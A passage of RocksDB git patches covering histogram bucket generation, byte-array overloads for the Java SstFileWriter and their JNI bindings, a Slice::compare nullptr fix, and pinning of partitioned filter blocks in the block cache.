90, 100, 120, 140, 160, 180, - 200, 250, 300, 350, 400, 450, - 500, 600, 700, 800, 900, 1000, - 1200, 1400, 1600, 1800, 2000, 2500, - 3000, 3500, 4000, 4500, 5000, 6000, - 7000, 8000, 9000, 10000, 12000, 14000, - 16000, 18000, 20000, 25000, 30000, 35000, - 40000, 45000, 50000, 60000, 70000, 80000, - 90000, 100000, 120000, 140000, 160000, 180000, - 200000, 250000, 300000, 350000, 400000, 450000, - 500000, 600000, 700000, 800000, 900000, 1000000, - 1200000, 1400000, 1600000, 1800000, 2000000, 2500000, - 3000000, 3500000, 4000000, 4500000, 5000000, 6000000, - 7000000, 8000000, 9000000, 10000000, 12000000, 14000000, - 16000000, 18000000, 20000000, 25000000, 30000000, 35000000, - 40000000, 45000000, 50000000, 60000000, 70000000, 80000000, - 90000000, 100000000, 120000000, 140000000, 160000000, 180000000, - 200000000, 250000000, 300000000, 350000000, 400000000, 450000000, - 500000000, 600000000, 700000000, 800000000, 900000000, 1000000000}), - maxBucketValue_(bucketValues_.back()), - minBucketValue_(bucketValues_.front()) { - for (size_t i =0; i < bucketValues_.size(); ++i) { - valueIndexMap_[bucketValues_[i]] = i; +HistogramBucketMapper::HistogramBucketMapper() { + // If you change this, you also need to change + // size of array buckets_ in HistogramImpl + bucketValues_ = {1, 2}; + valueIndexMap_ = {{1, 0}, {2, 1}}; + double bucket_val = static_cast(bucketValues_.back()); + while ((bucket_val = 1.5 * bucket_val) <= static_cast(port::kMaxUint64)) { + bucketValues_.push_back(static_cast(bucket_val)); + // Extracts two most significant digits to make histogram buckets more + // human-readable. E.g., 172 becomes 170. 
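// Worked progression under the 1.5 factor: 1, 2, 3, 4, 6, 9, 13, 19, 28, 42,
// 63, 94 (no rounding yet); the loop below then turns 94 * 1.5 = 141 into
// 140, later 315 into 310, and so on up to kMaxUint64.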
+ uint64_t pow_of_ten = 1; + while (bucketValues_.back() / 10 > 10) { + bucketValues_.back() /= 10; + pow_of_ten *= 10; + } + bucketValues_.back() *= pow_of_ten; + valueIndexMap_[bucketValues_.back()] = bucketValues_.size() - 1; } + maxBucketValue_ = bucketValues_.back(); + minBucketValue_ = bucketValues_.front(); } size_t HistogramBucketMapper::IndexForValue(const uint64_t value) const { diff --git a/monitoring/histogram.h b/monitoring/histogram.h index 6a1ebbf0489..6bf2e9e93f7 100644 --- a/monitoring/histogram.h +++ b/monitoring/histogram.h @@ -45,9 +45,9 @@ class HistogramBucketMapper { } private: - const std::vector bucketValues_; - const uint64_t maxBucketValue_; - const uint64_t minBucketValue_; + std::vector bucketValues_; + uint64_t maxBucketValue_; + uint64_t minBucketValue_; std::map valueIndexMap_; }; @@ -89,7 +89,7 @@ struct HistogramStat { std::atomic_uint_fast64_t num_; std::atomic_uint_fast64_t sum_; std::atomic_uint_fast64_t sum_squares_; - std::atomic_uint_fast64_t buckets_[138]; // 138==BucketMapper::BucketCount() + std::atomic_uint_fast64_t buckets_[109]; // 109==BucketMapper::BucketCount() const uint64_t num_buckets_; }; @@ -146,4 +146,4 @@ class HistogramImpl : public Histogram { std::mutex mutex_; }; -} // namespace rocksdb \ No newline at end of file +} // namespace rocksdb diff --git a/monitoring/histogram_test.cc b/monitoring/histogram_test.cc index 70147af7267..b4e3c981c8e 100644 --- a/monitoring/histogram_test.cc +++ b/monitoring/histogram_test.cc @@ -29,33 +29,31 @@ void PopulateHistogram(Histogram& histogram, } void BasicOperation(Histogram& histogram) { - PopulateHistogram(histogram, 1, 100, 10); + PopulateHistogram(histogram, 1, 110, 10); // fill up to bucket [70, 110) HistogramData data; histogram.Data(&data); - ASSERT_LE(fabs(histogram.Percentile(100.0) - 100.0), kIota); - ASSERT_LE(fabs(data.percentile99 - 99.0), kIota); - ASSERT_LE(fabs(data.percentile95 - 95.0), kIota); - ASSERT_LE(fabs(data.median - 50.0), kIota); - ASSERT_EQ(data.average, 50.5); // avg is acurately calculated. - ASSERT_LT(fabs(data.standard_deviation- 28.86), kIota); //sd is ~= 28.86 + ASSERT_LE(fabs(histogram.Percentile(100.0) - 110.0), kIota); + ASSERT_LE(fabs(data.percentile99 - 108.9), kIota); // 99 * 110 / 100 + ASSERT_LE(fabs(data.percentile95 - 104.5), kIota); // 95 * 110 / 100 + ASSERT_LE(fabs(data.median - 55.0), kIota); // 50 * 110 / 100 + ASSERT_EQ(data.average, 55.5); // (1 + 110) / 2 } void MergeHistogram(Histogram& histogram, Histogram& other) { PopulateHistogram(histogram, 1, 100); - PopulateHistogram(other, 101, 200); + PopulateHistogram(other, 101, 250); histogram.Merge(other); HistogramData data; histogram.Data(&data); - ASSERT_LE(fabs(histogram.Percentile(100.0) - 200.0), kIota); - ASSERT_LE(fabs(data.percentile99 - 198.0), kIota); - ASSERT_LE(fabs(data.percentile95 - 190.0), kIota); - ASSERT_LE(fabs(data.median - 100.0), kIota); - ASSERT_EQ(data.average, 100.5); // avg is acurately calculated. 
- ASSERT_LT(fabs(data.standard_deviation - 57.73), kIota); //sd is ~= 57.73 + ASSERT_LE(fabs(histogram.Percentile(100.0) - 250.0), kIota); + ASSERT_LE(fabs(data.percentile99 - 247.5), kIota); // 99 * 250 / 100 + ASSERT_LE(fabs(data.percentile95 - 237.5), kIota); // 95 * 250 / 100 + ASSERT_LE(fabs(data.median - 125.0), kIota); // 50 * 250 / 100 + ASSERT_EQ(data.average, 125.5); // (1 + 250) / 2 } void EmptyHistogram(Histogram& histogram) { From 78cb6b611295ab7e5d1adc9b1707355ef879bc63 Mon Sep 17 00:00:00 2001 From: Chen Shen Date: Tue, 22 Aug 2017 12:46:29 -0700 Subject: [PATCH 138/205] Provide byte[] version of SstFileWriter.merge to reduce GC Stall Summary: In Java API, `SstFileWriter.put/merge/delete` takes `Slice` type of key and value, which is a Java wrapper object around C++ Slice object. The Slice object inherited [ `finalize`](https://github.com/facebook/rocksdb/blob/3c327ac2d0fd50bbd82fe1f1af5de909dad769e6/java/src/main/java/org/rocksdb/AbstractNativeReference.java#L69) method, which [added huge overhead](https://softwareengineering.stackexchange.com/questions/288715/is-overriding-object-finalize-really-bad/288753#288753) to JVM while creating new SstFile. To address this issue, this PR overloads the merge method to take a Java byte array instead of the Slice object, and adds a unit test for it. We also benchmarked these two different merge functions, where we could see GC Stall reduced from 50% to 1%, and the throughput increased from 50MB to 200MB. Closes https://github.com/facebook/rocksdb/pull/2746 Reviewed By: sagar0 Differential Revision: D5653145 Pulled By: scv119 fbshipit-source-id: b55ea58554b573d0b1c6f6170f8d9223811bc4f5 --- java/rocksjni/sst_file_writerjni.cc | 116 ++++++++++++++++-- .../main/java/org/rocksdb/SstFileWriter.java | 50 ++++++++ .../java/org/rocksdb/SstFileWriterTest.java | 26 +++- 3 files changed, 180 insertions(+), 12 deletions(-) diff --git a/java/rocksjni/sst_file_writerjni.cc b/java/rocksjni/sst_file_writerjni.cc index 40595fb95df..ceb93384acc 100644 --- a/java/rocksjni/sst_file_writerjni.cc +++ b/java/rocksjni/sst_file_writerjni.cc @@ -77,9 +77,9 @@ void Java_org_rocksdb_SstFileWriter_open(JNIEnv *env, jobject jobj, * Method: put * Signature: (JJJ)V */ -void Java_org_rocksdb_SstFileWriter_put(JNIEnv *env, jobject jobj, - jlong jhandle, jlong jkey_handle, - jlong jvalue_handle) { +void Java_org_rocksdb_SstFileWriter_put__JJJ(JNIEnv *env, jobject jobj, + jlong jhandle, jlong jkey_handle, + jlong jvalue_handle) { auto *key_slice = reinterpret_cast(jkey_handle); auto *value_slice = reinterpret_cast(jvalue_handle); rocksdb::Status s = @@ -90,14 +90,51 @@ void Java_org_rocksdb_SstFileWriter_put(JNIEnv *env, jobject jobj, } } +/* + * Class: org_rocksdb_SstFileWriter + * Method: put + * Signature: (JJJ)V + */ + void Java_org_rocksdb_SstFileWriter_put__J_3B_3B(JNIEnv *env, jobject jobj, + jlong jhandle, jbyteArray jkey, + jbyteArray jval) { + jbyte* key = env->GetByteArrayElements(jkey, nullptr); + if(key == nullptr) { + // exception thrown: OutOfMemoryError + return; + } + rocksdb::Slice key_slice( + reinterpret_cast(key), env->GetArrayLength(jkey)); + + jbyte* value = env->GetByteArrayElements(jval, nullptr); + if(value == nullptr) { + // exception thrown: OutOfMemoryError + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + return; + } + rocksdb::Slice value_slice( + reinterpret_cast(value), env->GetArrayLength(jval)); + + rocksdb::Status s = + reinterpret_cast(jhandle)->Put(key_slice, + value_slice); + + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); +
env->ReleaseByteArrayElements(jval, value, JNI_ABORT); + + if (!s.ok()) { + rocksdb::RocksDBExceptionJni::ThrowNew(env, s); + } +} + /* * Class: org_rocksdb_SstFileWriter * Method: merge * Signature: (JJJ)V */ -void Java_org_rocksdb_SstFileWriter_merge(JNIEnv *env, jobject jobj, - jlong jhandle, jlong jkey_handle, - jlong jvalue_handle) { +void Java_org_rocksdb_SstFileWriter_merge__JJJ(JNIEnv *env, jobject jobj, + jlong jhandle, jlong jkey_handle, + jlong jvalue_handle) { auto *key_slice = reinterpret_cast(jkey_handle); auto *value_slice = reinterpret_cast(jvalue_handle); rocksdb::Status s = @@ -108,13 +145,76 @@ void Java_org_rocksdb_SstFileWriter_merge(JNIEnv *env, jobject jobj, } } +/* + * Class: org_rocksdb_SstFileWriter + * Method: merge + * Signature: (J[B[B)V + */ +void Java_org_rocksdb_SstFileWriter_merge__J_3B_3B(JNIEnv *env, jobject jobj, + jlong jhandle, jbyteArray jkey, + jbyteArray jval) { + + jbyte* key = env->GetByteArrayElements(jkey, nullptr); + if(key == nullptr) { + // exception thrown: OutOfMemoryError + return; + } + rocksdb::Slice key_slice( + reinterpret_cast(key), env->GetArrayLength(jkey)); + + jbyte* value = env->GetByteArrayElements(jval, nullptr); + if(value == nullptr) { + // exception thrown: OutOfMemoryError + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + return; + } + rocksdb::Slice value_slice( + reinterpret_cast(value), env->GetArrayLength(jval)); + + rocksdb::Status s = + reinterpret_cast(jhandle)->Merge(key_slice, + value_slice); + + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + env->ReleaseByteArrayElements(jval, value, JNI_ABORT); + + if (!s.ok()) { + rocksdb::RocksDBExceptionJni::ThrowNew(env, s); + } +} + +/* + * Class: org_rocksdb_SstFileWriter + * Method: delete + * Signature: (JJJ)V + */ +void Java_org_rocksdb_SstFileWriter_delete__J_3B(JNIEnv *env, jobject jobj, + jlong jhandle, jbyteArray jkey) { + jbyte* key = env->GetByteArrayElements(jkey, nullptr); + if(key == nullptr) { + // exception thrown: OutOfMemoryError + return; + } + rocksdb::Slice key_slice( + reinterpret_cast(key), env->GetArrayLength(jkey)); + + rocksdb::Status s = + reinterpret_cast(jhandle)->Delete(key_slice); + + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + + if (!s.ok()) { + rocksdb::RocksDBExceptionJni::ThrowNew(env, s); + } +} + /* * Class: org_rocksdb_SstFileWriter * Method: delete * Signature: (JJJ)V */ -void Java_org_rocksdb_SstFileWriter_delete(JNIEnv *env, jobject jobj, - jlong jhandle, jlong jkey_handle) { + void Java_org_rocksdb_SstFileWriter_delete__JJ(JNIEnv *env, jobject jobj, + jlong jhandle, jlong jkey_handle) { auto *key_slice = reinterpret_cast(jkey_handle); rocksdb::Status s = reinterpret_cast(jhandle)->Delete(*key_slice); diff --git a/java/src/main/java/org/rocksdb/SstFileWriter.java b/java/src/main/java/org/rocksdb/SstFileWriter.java index 8fe576082e8..5f35f0f61db 100644 --- a/java/src/main/java/org/rocksdb/SstFileWriter.java +++ b/java/src/main/java/org/rocksdb/SstFileWriter.java @@ -117,6 +117,20 @@ public void put(final DirectSlice key, final DirectSlice value) put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle()); } + /** + * Add a Put key with value to currently opened file. + * + * @param key the specified key to be inserted. + * @param value the value associated with the specified key. + * + * @throws RocksDBException thrown if error happens in underlying + * native library. 
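// JNI_ABORT releases the pinned array elements without copying them back to
// the Java heap; that is safe here because the native side only reads the
// key and value bytes and never mutates them.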
+ */ +public void put(final byte[] key, final byte[] value) + throws RocksDBException { + put(nativeHandle_, key, value); +} + /** * Add a Merge key with value to currently opened file. * @@ -132,6 +146,21 @@ public void merge(final Slice key, final Slice value) merge(nativeHandle_, key.getNativeHandle(), value.getNativeHandle()); } + /** + * Add a Merge key with value to currently opened file. + * + * @param key the specified key to be merged. + * @param value the value to be merged with the current value for + * the specified key. + * + * @throws RocksDBException thrown if error happens in underlying + * native library. + */ + public void merge(final byte[] key, final byte[] value) + throws RocksDBException { + merge(nativeHandle_, key, value); + } + /** * Add a Merge key with value to currently opened file. * @@ -171,6 +200,18 @@ public void delete(final DirectSlice key) throws RocksDBException { delete(nativeHandle_, key.getNativeHandle()); } + /** + * Add a deletion key to currently opened file. + * + * @param key the specified key to be deleted. + * + * @throws RocksDBException thrown if error happens in underlying + * native library. + */ + public void delete(final byte[] key) throws RocksDBException { + delete(nativeHandle_, key); + } + /** * Finish the process and close the sst file. * @@ -193,13 +234,22 @@ private native void open(final long handle, final String filePath) private native void put(final long handle, final long keyHandle, final long valueHandle) throws RocksDBException; + + private native void put(final long handle, final byte[] key, + final byte[] value) throws RocksDBException; private native void merge(final long handle, final long keyHandle, final long valueHandle) throws RocksDBException; + private native void merge(final long handle, final byte[] key, + final byte[] value) throws RocksDBException; + private native void delete(final long handle, final long keyHandle) throws RocksDBException; + private native void delete(final long handle, final byte[] key) + throws RocksDBException; + private native void finish(final long handle) throws RocksDBException; @Override protected final native void disposeInternal(final long handle); diff --git a/java/src/test/java/org/rocksdb/SstFileWriterTest.java b/java/src/test/java/org/rocksdb/SstFileWriterTest.java index 8c3b0c3d9f5..6261210b129 100644 --- a/java/src/test/java/org/rocksdb/SstFileWriterTest.java +++ b/java/src/test/java/org/rocksdb/SstFileWriterTest.java @@ -30,7 +30,7 @@ public class SstFileWriterTest { @Rule public TemporaryFolder parentFolder = new TemporaryFolder(); - enum OpType { PUT, MERGE, DELETE } + enum OpType { PUT, PUT_BYTES, MERGE, MERGE_BYTES, DELETE, DELETE_BYTES} class KeyValueWithOp { KeyValueWithOp(String key, String value, OpType opType) { @@ -79,16 +79,27 @@ private File newSstFile(final List keyValues, for (KeyValueWithOp keyValue : keyValues) { Slice keySlice = new Slice(keyValue.getKey()); Slice valueSlice = new Slice(keyValue.getValue()); + byte[] keyBytes = keyValue.getKey().getBytes(); + byte[] valueBytes = keyValue.getValue().getBytes(); switch (keyValue.getOpType()) { case PUT: sstFileWriter.put(keySlice, valueSlice); break; + case PUT_BYTES: + sstFileWriter.put(keyBytes, valueBytes); + break; case MERGE: sstFileWriter.merge(keySlice, valueSlice); break; + case MERGE_BYTES: + sstFileWriter.merge(keyBytes, valueBytes); + break; case DELETE: sstFileWriter.delete(keySlice); break; + case DELETE_BYTES: + sstFileWriter.delete(keyBytes); + break; default: fail("Unsupported op type"); } @@ 
-142,8 +153,12 @@ public void ingestSstFile() throws RocksDBException, IOException { final List keyValues = new ArrayList<>(); keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT)); keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT)); - keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE)); - keyValues.add(new KeyValueWithOp("key4", "", OpType.DELETE)); + keyValues.add(new KeyValueWithOp("key3", "value3", OpType.PUT_BYTES)); + keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE)); + keyValues.add(new KeyValueWithOp("key5", "value5", OpType.MERGE_BYTES)); + keyValues.add(new KeyValueWithOp("key6", "", OpType.DELETE)); + keyValues.add(new KeyValueWithOp("key7", "", OpType.DELETE)); + final File sstFile = newSstFile(keyValues, false); final File dbFolder = parentFolder.newFolder(DB_DIRECTORY_NAME); @@ -161,7 +176,10 @@ public void ingestSstFile() throws RocksDBException, IOException { assertThat(db.get("key1".getBytes())).isEqualTo("value1".getBytes()); assertThat(db.get("key2".getBytes())).isEqualTo("value2".getBytes()); assertThat(db.get("key3".getBytes())).isEqualTo("value3".getBytes()); - assertThat(db.get("key4".getBytes())).isEqualTo(null); + assertThat(db.get("key4".getBytes())).isEqualTo("value4".getBytes()); + assertThat(db.get("key5".getBytes())).isEqualTo("value5".getBytes()); + assertThat(db.get("key6".getBytes())).isEqualTo(null); + assertThat(db.get("key7".getBytes())).isEqualTo(null); } } From 39ef900551a4d88c8546ca086baaba76730e6162 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 22 Aug 2017 16:40:55 -0700 Subject: [PATCH 139/205] stop calling memcmp with nullptrs Summary: it doesn't take nullptr according to its declaration in glibc, and calling it in this way causes our sanitizers (ubsan, clang analyze) to fail. Closes https://github.com/facebook/rocksdb/pull/2776 Differential Revision: D5683260 Pulled By: ajkr fbshipit-source-id: 114b137ee188172f96eedc43139255cae7bee80a --- include/rocksdb/slice.h | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index d1786dd44da..ec33c97e632 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -213,18 +213,17 @@ inline bool operator!=(const Slice& x, const Slice& y) { return !(x == y); } -// UBSAN complain that we pass nullptr to memcmp that's fine since -// we always do that for a string of len = 0 -#ifdef ROCKSDB_UBSAN_RUN -#if defined(__clang__) -__attribute__((__no_sanitize__("undefined"))) -#elif defined(__GNUC__) -__attribute__((__no_sanitize_undefined__)) -#endif -#endif inline int Slice::compare(const Slice& b) const { const size_t min_len = (size_ < b.size_) ? size_ : b.size_; - assert((data_ != nullptr && b.data_ != nullptr) || min_len == 0); + if (min_len == 0) { + if (size_ > 0) { + return 1; + } else if (b.size_ > 0) { + return -1; + } + return 0; + } + assert(data_ != nullptr && b.data_ != nullptr); int r = memcmp(data_, b.data_, min_len); if (r == 0) { if (size_ < b.size_) r = -1; From 1dfcdb15f93018c67f1d3528b60738dc0d3b5d05 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 23 Aug 2017 07:48:54 -0700 Subject: [PATCH 140/205] Extend pin_l0 to filter partitions Summary: This is the continuation of https://github.com/facebook/rocksdb/pull/2661 for filter partitions. When pin_l0 is set (along with cache_xxx), then on table open the filter partitions are loaded into the cache and pinned there.
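A hedged configuration sketch of the knobs involved; the option and type names below come from BlockBasedTableOptions, while the cache size and bloom bits are illustrative:

    rocksdb::BlockBasedTableOptions table_options;
    table_options.block_cache = rocksdb::NewLRUCache(512 << 20);
    table_options.cache_index_and_filter_blocks = true;            // the cache_xxx knob
    table_options.pin_l0_filter_and_index_blocks_in_cache = true;  // pin_l0
    table_options.index_type =
        rocksdb::BlockBasedTableOptions::kTwoLevelIndexSearch;     // partitioned index
    table_options.partition_filters = true;                        // partitioned filters
    table_options.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
    rocksdb::Options options;
    options.table_factory.reset(
        rocksdb::NewBlockBasedTableFactory(table_options));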
Closes https://github.com/facebook/rocksdb/pull/2766 Differential Revision: D5671098 Pulled By: maysamyabandeh fbshipit-source-id: 174f24018f1d7f1129621e7380287b65b67d2115 --- table/block_based_table_reader.cc | 68 ++++++++----- table/block_based_table_reader.h | 15 ++- table/filter_block.h | 5 +- table/partitioned_filter_block.cc | 130 ++++++++++++++++++------- table/partitioned_filter_block.h | 13 +-- table/partitioned_filter_block_test.cc | 9 +- 6 files changed, 163 insertions(+), 77 deletions(-) diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 7e236e8bfff..e047c644325 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -291,7 +291,8 @@ class PartitionIndexReader : public IndexReader, public Cleanable { } BlockBasedTable* table_; std::unique_ptr index_block_; - std::map> partition_map_; + std::unordered_map> + partition_map_; }; // Index that allows binary search lookup for the first key of each block. @@ -797,14 +798,13 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, rep->ioptions.info_log); } - // pre-fetching of blocks is turned on + const bool pin = + rep->table_options.pin_l0_filter_and_index_blocks_in_cache && level == 0; + // pre-fetching of blocks is turned on // Will use block cache for index/filter blocks access // Always prefetch index and filter for level 0 if (table_options.cache_index_and_filter_blocks) { if (prefetch_index_and_filter_in_cache || level == 0) { - const bool pin = - rep->table_options.pin_l0_filter_and_index_blocks_in_cache && - level == 0; assert(table_options.block_cache != nullptr); // Hack: Call NewIndexIterator() to implicitly add index to the // block_cache @@ -823,15 +823,15 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, if (s.ok()) { // Hack: Call GetFilter() to implicitly add filter to the block_cache auto filter_entry = new_table->GetFilter(); + if (filter_entry.value != nullptr) { + filter_entry.value->CacheDependencies(pin); + } // if pin_l0_filter_and_index_blocks_in_cache is true, and this is // a level0 file, then save it in rep_->filter_entry; it will be // released in the destructor only, hence it will be pinned in the // cache while this reader is alive if (pin) { rep->filter_entry = filter_entry; - if (rep->filter_entry.value != nullptr) { - rep->filter_entry.value->SetLevel(level); - } } else { filter_entry.Release(table_options.block_cache.get()); } @@ -844,17 +844,25 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, IndexReader* index_reader = nullptr; s = new_table->CreateIndexReader(prefetch_buffer.get(), &index_reader, meta_iter.get(), level); - if (s.ok()) { rep->index_reader.reset(index_reader); + // The partitions of partitioned index are always stored in cache. 
They + // hence follow the configuration for pin and prefetch regardless of + // the value of cache_index_and_filter_blocks + if (prefetch_index_and_filter_in_cache || level == 0) { + rep->index_reader->CacheDependencies(pin); + } // Set filter block if (rep->filter_policy) { const bool is_a_filter_partition = true; - rep->filter.reset(new_table->ReadFilter( - prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition)); - if (rep->filter.get()) { - rep->filter->SetLevel(level); + auto filter = new_table->ReadFilter( + prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition); + rep->filter.reset(filter); + // Refer to the comment above about partitioned indexes always being + // cached + if (filter && (prefetch_index_and_filter_in_cache || level == 0)) { + filter->CacheDependencies(pin); + } } } else { @@ -1171,15 +1179,16 @@ FilterBlockReader* BlockBasedTable::ReadFilter( } BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter( - bool no_io) const { + FilePrefetchBuffer* prefetch_buffer, bool no_io) const { const BlockHandle& filter_blk_handle = rep_->filter_handle; const bool is_a_filter_partition = true; - return GetFilter(filter_blk_handle, !is_a_filter_partition, no_io); + return GetFilter(prefetch_buffer, filter_blk_handle, !is_a_filter_partition, + no_io); } BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const { + FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle, + const bool is_a_filter_partition, bool no_io) const { // If cache_index_and_filter_blocks is false, filter should be pre-populated. // We will return rep_->filter anyway. rep_->filter can be nullptr if filter // read fails at Open() time. We don't want to reload again since it will @@ -1219,8 +1228,8 @@ BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter( // Do not invoke any io.
return CachableEntry(); } else { - filter = ReadFilter(nullptr /* prefetch_buffer */, filter_blk_handle, - is_a_filter_partition); + filter = + ReadFilter(prefetch_buffer, filter_blk_handle, is_a_filter_partition); if (filter != nullptr) { assert(filter->size() > 0); Status s = block_cache->Insert( @@ -1482,7 +1491,7 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( BlockBasedTable::BlockEntryIteratorState::BlockEntryIteratorState( BlockBasedTable* table, const ReadOptions& read_options, const InternalKeyComparator* icomparator, bool skip_filters, bool is_index, - std::map>* block_map) + std::unordered_map>* block_map) : TwoLevelIteratorState(table->rep_->ioptions.prefix_extractor != nullptr), table_(table), read_options_(read_options), @@ -1501,9 +1510,19 @@ BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator( auto rep = table_->rep_; if (block_map_) { auto block = block_map_->find(handle.offset()); - assert(block != block_map_->end()); - return block->second.value->NewIterator(&rep->internal_comparator, nullptr, - true, rep->ioptions.statistics); + // This is a possible scenario since block cache might not have had space + // for the partition + if (block != block_map_->end()) { + PERF_COUNTER_ADD(block_cache_hit_count, 1); + RecordTick(rep->ioptions.statistics, BLOCK_CACHE_INDEX_HIT); + RecordTick(rep->ioptions.statistics, BLOCK_CACHE_HIT); + Cache* block_cache = rep->table_options.block_cache.get(); + assert(block_cache); + RecordTick(rep->ioptions.statistics, BLOCK_CACHE_BYTES_READ, + block_cache->GetUsage(block->second.cache_handle)); + return block->second.value->NewIterator( + &rep->internal_comparator, nullptr, true, rep->ioptions.statistics); + } } return NewDataBlockIterator(rep, read_options_, handle, nullptr, is_index_, s); @@ -1700,7 +1719,8 @@ Status BlockBasedTable::Get(const ReadOptions& read_options, const Slice& key, const bool no_io = read_options.read_tier == kBlockCacheTier; CachableEntry filter_entry; if (!skip_filters) { - filter_entry = GetFilter(read_options.read_tier == kBlockCacheTier); + filter_entry = GetFilter(/*prefetch_buffer*/ nullptr, + read_options.read_tier == kBlockCacheTier); } FilterBlockReader* filter = filter_entry.value; diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 640a7065645..a5426cdedf7 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -183,6 +183,9 @@ class BlockBasedTable : public TableReader { virtual void CacheDependencies(bool /* unused */) {} + // Prefetch all the blocks referenced by this index to the buffer + void PrefetchBlocks(FilePrefetchBuffer* buf); + protected: const InternalKeyComparator* icomparator_; @@ -210,6 +213,7 @@ class BlockBasedTable : public TableReader { explicit BlockBasedTable(Rep* rep) : rep_(rep) {} private: + friend class MockedBlockBasedTable; // input_iter: if it is not null, update this one and return it as Iterator static InternalIterator* NewDataBlockIterator(Rep* rep, const ReadOptions& ro, const Slice& index_value, @@ -239,10 +243,11 @@ class BlockBasedTable : public TableReader { // For the following two functions: // if `no_io == true`, we will not try to read filter/index from sst file // were they not present in cache yet. 
- CachableEntry<FilterBlockReader> GetFilter(bool no_io = false) const; + CachableEntry<FilterBlockReader> GetFilter( + FilePrefetchBuffer* prefetch_buffer = nullptr, bool no_io = false) const; virtual CachableEntry<FilterBlockReader> GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const; + FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle, + const bool is_a_filter_partition, bool no_io) const; // Get the iterator from the index reader. // If input_iter is not set, return new Iterator @@ -352,7 +357,7 @@ class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { BlockBasedTable* table, const ReadOptions& read_options, const InternalKeyComparator* icomparator, bool skip_filters, bool is_index = false, - std::map<uint64_t, CachableEntry<Block>>* block_map = nullptr); + std::unordered_map<uint64_t, CachableEntry<Block>>* block_map = nullptr); InternalIterator* NewSecondaryIterator(const Slice& index_value) override; bool PrefixMayMatch(const Slice& internal_key) override; bool KeyReachedUpperBound(const Slice& internal_key) override; @@ -365,7 +370,7 @@ class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { bool skip_filters_; // true if the 2nd level iterator is on indexes instead of on user data. bool is_index_; - std::map<uint64_t, CachableEntry<Block>>* block_map_; + std::unordered_map<uint64_t, CachableEntry<Block>>* block_map_; port::RWMutex cleaner_mu; }; diff --git a/table/filter_block.h b/table/filter_block.h index 94136f659e1..7bf3b31324d 100644 --- a/table/filter_block.h +++ b/table/filter_block.h @@ -108,15 +108,14 @@ class FilterBlockReader { bool whole_key_filtering() const { return whole_key_filtering_; } - int GetLevel() const { return level_; } - void SetLevel(int level) { level_ = level; } - // convert this object to a human readable form virtual std::string ToString() const { std::string error_msg("Unsupported filter \n"); return error_msg; } + virtual void CacheDependencies(bool pin) {} + protected: bool whole_key_filtering_; diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index d3d7949d09f..202245939fe 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -7,6 +7,7 @@ #include <utility> +#include "monitoring/perf_context_imp.h" #include "port/port.h" #include "rocksdb/filter_policy.h" #include "table/block.h" @@ -100,19 +101,29 @@ PartitionedFilterBlockReader::PartitionedFilterBlockReader( } PartitionedFilterBlockReader::~PartitionedFilterBlockReader() { - { - ReadLock rl(&mu_); - for (auto it = handle_list_.begin(); it != handle_list_.end(); ++it) { - table_->rep_->table_options.block_cache.get()->Release(*it); - } + // TODO(myabandeh): if instead of filter object we store only the blocks in + // block cache, then we don't have to manually erase them from block cache + // here.
+ auto block_cache = table_->rep_->table_options.block_cache.get(); + if (UNLIKELY(block_cache == nullptr)) { + return; } char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length]; - for (auto it = filter_block_set_.begin(); it != filter_block_set_.end(); - ++it) { + BlockIter biter; + BlockHandle handle; + idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true); + biter.SeekToFirst(); + for (; biter.Valid(); biter.Next()) { + auto input = biter.value(); + auto s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + continue; + } auto key = BlockBasedTable::GetCacheKey(table_->rep_->cache_key_prefix, table_->rep_->cache_key_prefix_size, - *it, cache_key); - table_->rep_->table_options.block_cache.get()->Erase(key); + handle, cache_key); + block_cache->Erase(key); } } @@ -205,34 +216,22 @@ PartitionedFilterBlockReader::GetFilterPartition( const bool is_a_filter_partition = true; auto block_cache = table_->rep_->table_options.block_cache.get(); if (LIKELY(block_cache != nullptr)) { - bool pin_cached_filters = - GetLevel() == 0 && - table_->rep_->table_options.pin_l0_filter_and_index_blocks_in_cache; - if (pin_cached_filters) { - ReadLock rl(&mu_); - auto iter = 